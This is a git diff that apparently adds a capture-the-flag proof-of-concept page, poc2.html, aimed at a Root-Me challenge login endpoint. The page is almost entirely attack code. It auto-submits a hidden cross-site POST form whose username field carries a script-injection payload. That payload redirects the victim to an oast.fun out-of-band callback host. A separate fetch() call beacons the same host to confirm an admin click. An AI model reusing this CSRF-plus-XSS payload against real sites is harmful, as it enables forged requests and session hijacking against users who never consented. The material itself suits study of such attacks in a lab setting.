--- a/poc2.html
+++ b/poc2.html
@@ -1,3 +1,13 @@
-<script>
+<!DOCTYPE html>
+<html>
+  <body onload="document.forms[0].submit()">
+    <form action="http://challenge01.root-me.org:58003/login" method="POST">
+		<input type="hidden" name="username" value="<script>document.location = 'https://jrnhteacxragwsxmgdxlwnh0wn3hp1vx0.oast.fun/ADMINPROFILEXSS=true';</script>">
+    </form>
+
+	<!--<meta http-equiv="refresh" content="1;url=/profile">-->
+ <script>
 	fetch("https://jrnhteacxragwsxmgdxlwnh0wn3hp1vx0.oast.fun?proof=admin_clicked");
 </script>
+  </body>
+</html>
